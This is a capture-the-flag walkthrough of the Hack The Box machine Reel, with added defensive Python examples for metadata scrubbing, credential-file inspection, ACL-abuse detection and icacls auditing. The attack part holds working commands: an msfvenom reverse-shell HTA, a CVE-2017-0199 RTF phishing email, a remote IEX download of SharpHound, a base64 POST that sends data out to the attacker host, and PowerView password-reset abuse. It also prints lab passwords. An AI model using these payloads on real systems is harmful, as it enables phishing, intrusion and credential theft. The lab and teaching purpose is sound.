Basic Information

Port Scan

$ nmap -sC -sV -Pn 10.10.10.77
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-17 13:47 CST
Nmap scan report for 10.10.10.77
Host is up (0.068s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.91%I=7%D=11/17%Time=5FB36420%P=x86_64-apple-darwin19.6.0
SF:%r(NULL,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Ma
SF:il\x20Service\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.
SF:\r\n")%r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HEL
SF:O\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VR
SF:FY\r\n")%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20B
SF:ad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20com
SF:mands\r\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20
SF:Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20co
SF:mmands\r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x
SF:20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20
SF:commands\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503
SF:\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x
SF:20commands\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r
SF:(DNSVersionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSSt
SF:atusRequestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"
SF:220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20comm
SF:ands\r\n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(
SF:Kerberos,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220
SF:\x20Mail\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Servic
SF:e\x20ready\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20read
SF:y\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence
SF:\x20of\x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20read
SF:y\r\n")%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDA
SF:PBindReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"22
SF:0\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x
SF:20of\x20commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 2s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2020-11-17T05:51:01+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-11-17T05:50:58
|_ start_date: 2020-11-17T05:44:17

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 251.10 seconds

FTP

FTP allows anonymous access:

AppLocker.docx

It contains just one sentence:

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

readme.txt

Also very little content:

please email me any rtf format procedures - I’ll review and convert.

new format / converted documents will be saved here.

Windows Event Forwarding.docx

It contains some log information; the metadata yields an email address, nico@megabank.com:

$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.00
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 14 kB
File Modification Date/Time : 2020:11:17 13:51:41+08:00
File Access Date/Time : 2020:11:17 13:52:20+08:00
File Inode Change Date/Time : 2020:11:17 13:55:59+08:00
File Permissions : rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
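The Creator field exiftool surfaced lives in docProps/core.xml inside the DOCX zip. The following is an added example (not code from the original post) that reads that field without exiftool and strips it, which is the check a document owner would run before publishing a file to a share. The sample document is constructed in memory with only the parts the example needs; the element names and namespaces are the standard Open Packaging core-properties ones.

```python
"""Read and scrub the dc:creator field of a DOCX (added example, not from the post).
A DOCX is a zip archive; docProps/core.xml carries Dublin Core metadata such as
dc:creator and cp:lastModifiedBy, which is where the nico@megabank.com address
came from. The sample document built below is constructed for this example."""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
CORE = "docProps/core.xml"
for prefix, uri in NS.items():  # keep the usual prefixes when re-serialising
    ET.register_namespace(prefix, uri)


def build_sample_docx(creator: str) -> bytes:
    """Constructed minimal DOCX: a content-types part, core properties and a body."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>%s</dc:creator><cp:lastModifiedBy>%s</cp:lastModifiedBy>"
        "</cp:coreProperties>" % (NS["cp"], NS["dc"], creator, creator)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr(CORE, core)
        zf.writestr("word/document.xml", "<document/>")
    return buf.getvalue()


def read_creator(docx_bytes: bytes) -> Optional[str]:
    """Return dc:creator from docProps/core.xml, or None if the part or field is absent."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if CORE not in zf.namelist():
            return None
        root = ET.fromstring(zf.read(CORE))
    node = root.find("dc:creator", NS)
    return node.text if node is not None else None


def scrub_creator(docx_bytes: bytes) -> bytes:
    """Rewrite the archive with dc:creator and cp:lastModifiedBy blanked; every
    other zip member is copied through unchanged."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == CORE:
                root = ET.fromstring(data)
                for tag in ("dc:creator", "cp:lastModifiedBy"):
                    node = root.find(tag, NS)
                    if node is not None:
                        node.text = ""
                data = ET.tostring(root, xml_declaration=True, encoding="UTF-8")
            dst.writestr(item, data)  # writestr recomputes size and CRC for us
    return out.getvalue()


def list_members(docx_bytes: bytes) -> List[str]:
    """Sorted member names, used to confirm scrubbing touched nothing else."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        return sorted(zf.namelist())


if __name__ == "__main__":
    doc = build_sample_docx("nico@megabank.com")
    print("before:", read_creator(doc))
    print("after: ", read_creator(scrub_creator(doc)))
```

Word also keeps author information in docProps/app.xml (Company) and in comments and revision marks, so a production scrubber should walk those parts too; this example only handles the core-properties fields shown in the exiftool output.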

SMTP

Manual testing showed it accepts any reel.htb mailbox, so enumerate:

smtp-user-enum

➜  Reel smtp-user-enum -M RCPT -U users.txt -t 10.10.10.77
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

----------------------------------------------------------
| Scan Information |
----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 15
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Thu Nov 12 20:06:01 2020 #########
10.10.10.77: reel@htb exists
10.10.10.77: reel@htb.local exists
10.10.10.77: administrator@htb exists
10.10.10.77: admin@htb exists
10.10.10.77: reel@reel.htb exists
10.10.10.77: root@htb exists
10.10.10.77: sadfasdfasdfasdf@htb exists
10.10.10.77: nico@megabank.com exists
10.10.10.77: htb@metabank.com exists
######## Scan completed at Thu Nov 12 20:06:03 2020 #########
9 results.

15 queries in 2 seconds (7.5 queries / sec)

users.txt

reel
administrator
admin
root
reel@htb
reel@htb.local
reel@reel.htb
administrator@htb
admin@htb
root@htb
sadfasdfasdfasdf@htb
nico@megabank.com
0xdf@megabank.com
htb@metabank.com

RTF vuln

The readme above hints at emailing RTF-format files; the related vulnerability:

  • bhdresh/CVE-2017-0199: Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
    https://github.com/bhdresh/CVE-2017-0199

Generating the HTA

First, generate a malicious HTA directly with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f hta-psh -o msfv.hta

Generating the RTF

Then generate the RTF file with the exploit script:

python CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.6/msfv.hta -t rtf -x 0

sendemail && getshell

Then, with everything ready, send the phishing email and get a shell:

sudo python -m SimpleHTTPServer 80
nc -lvvp 443
sendEmail -f miao@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s 10.10.10.77 -v

msf one-click

msf has the exploit/windows/fileformat/office_word_hta module, which generates the HTA and RTF files and starts the listener in one step; you only need to send the email yourself.

user flag

The shell obtained is as user nico; user.txt is on the desktop:

nico to tom

cred.xml

nico's desktop has a cred.xml file containing credentials for the tom account:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>

creds

Parse this XML directly with PowerShell to get tom's password:

powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"

UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
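Why could a shell running as nico recover tom's password? Export-Clixml serialises the PSCredential's SecureString as a hex-encoded DPAPI blob (CryptProtectData), which is decryptable only under the user profile that exported it, on that machine. The following added example (not code from the original post) parses such a file without PowerShell and checks what protects the secret. The sample file is constructed: it follows the cred.xml layout above, but the blob body after the DPAPI header is a placeholder; the field names in the returned dict are this example's own.

```python
"""Parse an Export-Clixml PSCredential file and report how the secret is protected
(added example, not from the post). The <SS> element holds CryptProtectData output
as hex; a DPAPI blob is bound to the exporting user's master key, so a credential
file is as safe as that user's session and no safer. The sample XML below is
constructed: the layout copies cred.xml, the blob body is a placeholder."""
import xml.etree.ElementTree as ET
from typing import Dict, Optional

PS_NS = {"ps": "http://schemas.microsoft.com/powershell/2004/04"}
# Every DPAPI blob begins with version 1 followed by the provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian wire order.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample in the Export-Clixml format; the <SS> body is a placeholder.
SAMPLE_CLIXML = (
    '<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">\n'
    '<Obj RefId="0">\n<TN RefId="0">\n'
    "<T>System.Management.Automation.PSCredential</T>\n<T>System.Object</T>\n</TN>\n"
    "<ToString>System.Management.Automation.PSCredential</ToString>\n<Props>\n"
    '<S N="UserName">HTB\\Tom</S>\n'
    '<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb' + "00" * 32 + "</SS>\n"
    "</Props>\n</Obj>\n</Objs>"
)


def parse_clixml_credential(xml_text: str) -> Dict[str, Optional[str]]:
    """Return the serialised PSCredential's user name and hex SecureString."""
    root = ET.fromstring(xml_text)
    type_names = [t.text for t in root.findall(".//ps:TN/ps:T", PS_NS)]
    if "System.Management.Automation.PSCredential" not in type_names:
        raise ValueError("not a serialised PSCredential")
    user = root.find(".//ps:Props/ps:S[@N='UserName']", PS_NS)
    secret = root.find(".//ps:Props/ps:SS[@N='Password']", PS_NS)
    return {
        "username": user.text if user is not None else None,
        "secure_string_hex": secret.text if secret is not None else None,
    }


def is_dpapi_blob(hex_blob: Optional[str]) -> bool:
    """True when the SecureString carries the DPAPI header (the default Export-Clixml case)."""
    if not hex_blob:
        return False
    try:
        raw = bytes.fromhex(hex_blob)
    except ValueError:
        return False
    return raw.startswith(DPAPI_HEADER)


def protection_summary(xml_text: str) -> Dict[str, object]:
    """DPAPI-protected means only the exporting user on the exporting machine can
    decrypt it; anything else was most likely produced with an explicit key
    (ConvertFrom-SecureString -Key) and is portable wherever that key is known."""
    cred = parse_clixml_credential(xml_text)
    dpapi = is_dpapi_blob(cred["secure_string_hex"])
    domain, _, user = (cred["username"] or "").rpartition("\\")
    return {
        "domain": domain or None,
        "user": user or None,
        "dpapi_protected": dpapi,
        "portable": not dpapi,
    }


if __name__ == "__main__":
    print(protection_summary(SAMPLE_CLIXML))
```

The practical consequence for defenders: a cred.xml left in a user's profile is readable by anything that runs as that user (a phished document included), so the right control is not to persist privileged credentials this way at all, rather than to rely on DPAPI.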

ssh

Note that port 22 (SSH) was open earlier; the tom account can log in directly via SSH:

Privilege Escalation Information

tom's desktop has an AD Audit directory containing BloodHound (this really is part of the box, not uploaded by someone else) and a note.txt:

groups

Following the hint, look at the other groups; there is a Backup_Admins group, and groups like this usually have privileges:

$groups = [adsi] "LDAP://REEL:389/OU=Groups,DC=HTB,DC=LOCAL"
$searcher = New-Object System.DirectoryServices.DirectorySearcher $groups
$searcher.Filter = '(objectClass=Group)'
$results = $searcher.FindAll()
foreach ($result in $results) {$group = $result.Properties;$group.name}

Backup_Admins
AppLocker_Test
SharePoint_Admins
DR_Site
SQL_Admins
HelpDesk_Admins
Restrictions
All_Staff
MegaBank_Users
Finance_Users
HR_Team

note.txt

Findings:

Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).

Maybe we should re-run Cypher query against other groups we’ve created.

BloodHound

Although the box already has BloodHound results, the format has changed in newer versions, so upload a fresh collector and run it, then bring the results back for analysis. Transferring the results is slightly awkward: base64-encode them, then decode back into a zip:

IEX (New-Object Net.Webclient).downloadstring("http://10.10.14.6:9999/SharpHound.ps1")
Invoke-BloodHound -CollectionMethod All

$Base64String = [System.convert]::ToBase64String((Get-Content -Path 'c:/temp/20201117065659_BloodHound.zip' -Encoding Byte))
Invoke-WebRequest -Uri http://10.10.14.6:4445 -Method POST -Body $Base64String

echo <base64 encoded zip file> | base64 -d -w 0 > bloodhound_reel.zip

A quick analysis shows tom can reach Backup_Admins via the claire user:

tom to claire

Import PowerView and follow the BloodHound information step by step; then you can SSH in as claire with the password we set:

# Import PowerView
. .\PowerView.ps1
# Make tom the owner of claire's object (its ACL)
Set-DomainObjectOwner -identity claire -OwnerIdentity tom
# Grant tom the ResetPassword right on that ACL
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
# Create a credential, then set claire's password
$cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred
# It is recommended to paste all of the above at once; there is an automatic reset

claire to Backup_Admins

According to BloodHound, claire has GenericWrite over Backup_Admins; again step by step (the intended route is to Backup_Admins, but BloodHound's hint was that it leads to Domain Admin):

net group backup_admins claire /add
# After being added to backup_admins you must log in again for it to take effect
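From the defender's side, the tom-to-claire and claire-to-Backup_Admins steps above leave a recognisable trail in the Security log: a security-descriptor write on the user object (owner change and ACE addition), a password reset by the account that just gained the right, and a privileged-group addition by the freshly reset account. The following added example (not code from the original post) correlates those events over constructed input. Event IDs are the standard Windows ones: 5136 (directory service object modified), 4724 (password reset attempt), 4728/4732/4756 (member added to a security-enabled global/local/universal group). 5136 is only produced when "Audit Directory Service Changes" is enabled and the objects carry a SACL. The flat field names (`ts`, `subject`, `target`, `attr`, `group`) are this example's own simplification of the event XML.

```python
"""Correlate Security events for the ACL-abuse chain: security-descriptor write
on a user object, password reset by the writer, privileged-group add by the
reset account (added example, not from the post). Events are constructed and
flattened; a real pipeline would map these fields out of the EventData XML."""
from typing import Dict, Iterable, List, Set, Tuple

PRIVILEGED_GROUPS = {"htb\\backup_admins", "htb\\domain admins"}

# Constructed events, timestamps in seconds. The first four mirror the PowerView
# and net-group steps of the writeup; the last is a benign helpdesk reset.
SAMPLE_EVENTS = [
    {"ts": 0, "id": 5136, "subject": "HTB\\tom",
     "target": "CN=claire,CN=Users,DC=HTB,DC=LOCAL", "attr": "nTSecurityDescriptor"},
    {"ts": 4, "id": 5136, "subject": "HTB\\tom",
     "target": "CN=claire,CN=Users,DC=HTB,DC=LOCAL", "attr": "nTSecurityDescriptor"},
    {"ts": 9, "id": 4724, "subject": "HTB\\tom", "target": "claire"},
    {"ts": 420, "id": 4728, "subject": "HTB\\claire", "target": "claire",
     "group": "HTB\\Backup_Admins"},
    {"ts": 900, "id": 4724, "subject": "HTB\\helpdesk1", "target": "bob"},
]


def account_of(name: str) -> str:
    """Normalise 'CN=claire,CN=Users,DC=...', 'HTB\\claire' or 'claire' to 'claire'."""
    if name.upper().startswith("CN="):
        return name.split(",", 1)[0][3:].lower()
    return name.rsplit("\\", 1)[-1].lower()


def find_acl_abuse_chains(events: Iterable[Dict], privileged_groups: Set[str] = PRIVILEGED_GROUPS,
                          window: int = 3600) -> List[Dict]:
    """Return findings for (a) a password reset preceded within `window` seconds by
    a security-descriptor write on the same target by the same subject and (b) a
    privileged-group add performed by an account that added itself or whose own
    password was reset within `window` seconds."""
    findings: List[Dict] = []
    acl_writes: Dict[Tuple[str, str], int] = {}  # (subject, target) -> ts of last SD write
    resets: Dict[str, Tuple[int, str]] = {}      # target -> (ts, subject) of last reset
    for e in sorted(events, key=lambda ev: ev["ts"]):
        subj = account_of(e["subject"])
        if e["id"] == 5136 and e.get("attr", "").lower() == "ntsecuritydescriptor":
            acl_writes[(subj, account_of(e["target"]))] = e["ts"]
        elif e["id"] == 4724:
            target = account_of(e["target"])
            written = acl_writes.get((subj, target))
            if written is not None and e["ts"] - written <= window:
                findings.append({"rule": "acl_write_then_password_reset",
                                 "actor": subj, "target": target, "ts": e["ts"]})
            resets[target] = (e["ts"], subj)
        elif e["id"] in (4728, 4732, 4756) and e.get("group", "").lower() in privileged_groups:
            target = account_of(e["target"])
            last_reset = resets.get(subj)
            self_add = subj == target
            freshly_reset = last_reset is not None and e["ts"] - last_reset[0] <= window
            if self_add or freshly_reset:
                findings.append({"rule": "privileged_group_add_by_suspect_account",
                                 "actor": subj, "target": target,
                                 "group": e["group"], "ts": e["ts"]})
    return findings


if __name__ == "__main__":
    for f in find_acl_abuse_chains(SAMPLE_EVENTS):
        print(f)
```

The windowing matters: the writeup notes the box periodically resets these changes, and in a real environment the reset, the group add and the new login tend to happen within minutes of each other, so a one-hour window catches the chain while a helpdesk reset with no preceding ACL write (the last sample event) stays quiet.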

Backup_Admins to Administrator

Checking permissions, backup_admins has full access to the Administrator directory:

claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HTB\Backup_Admins:(OI)(CI)(F)
HTB\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
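The icacls listing is the kind of output an audit should parse rather than eyeball: on a user profile directory only SYSTEM, the local Administrators group and the profile owner are expected to hold full control, so HTB\Backup_Admins stands out. The following added example (not code from the original post) parses icacls output into ACEs and flags principals outside an expected set that hold any write-capable right. The sample is the listing above with its path prefix; the abbreviations handled are icacls' own (F, M, W and the granular WD/AD/WDAC/WO). Note that an (OI) entry only reaches files that inherit it, so a file with its own protected ACL can still deny access even when the parent directory grants (F).

```python
"""Parse icacls output and flag unexpected write access (added example, not from
the post). icacls prints '<path> <principal>:<flags>' on the first line and one
'<principal>:<flags>' per further ACE; flags are parenthesised tokens, some of
which are inheritance markers rather than rights."""
import re
from typing import Dict, List, Set

INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<flags>(?:\([^)]*\))+)$")

# Sample taken from the listing above (indentation already stripped).
SAMPLE_ICACLS = """Administrator NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
HTB\\Backup_Admins:(OI)(CI)(F)
HTB\\Administrator:(OI)(CI)(F)
BUILTIN\\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files"""


def parse_icacls(output: str, path: str) -> List[Dict]:
    """Return one dict per ACE with the principal, inheritance flags and rights."""
    entries: List[Dict] = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully"):
            continue
        if not entries and line.startswith(path + " "):  # first line carries the path
            line = line[len(path) + 1:]
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens = re.findall(r"\(([^)]*)\)", m.group("flags"))
        entries.append({
            "principal": m.group("principal"),
            "inherit": [t for t in tokens if t in INHERITANCE_FLAGS],
            # a granular ACE such as (RX,W) is one token with commas inside
            "rights": [r for t in tokens if t not in INHERITANCE_FLAGS for r in t.split(",")],
        })
    return entries


def unexpected_write_access(entries: List[Dict], expected: Set[str]) -> List[str]:
    """Principals not in `expected` (case-insensitive) that hold a write-capable right."""
    expected_l = {e.lower() for e in expected}
    return [
        e["principal"] for e in entries
        if e["principal"].lower() not in expected_l and set(e["rights"]) & WRITE_RIGHTS
    ]


if __name__ == "__main__":
    aces = parse_icacls(SAMPLE_ICACLS, "Administrator")
    baseline = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "HTB\\Administrator"}
    print(unexpected_write_access(aces, baseline))
```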

But reading root.txt directly is still denied:

Backup Scripts

The backup script contains the admin password:

# admin password
$password="Cr4ckMeIfYouC4n!"

root flag

Then log in directly as Administrator; root.txt is on the desktop:

References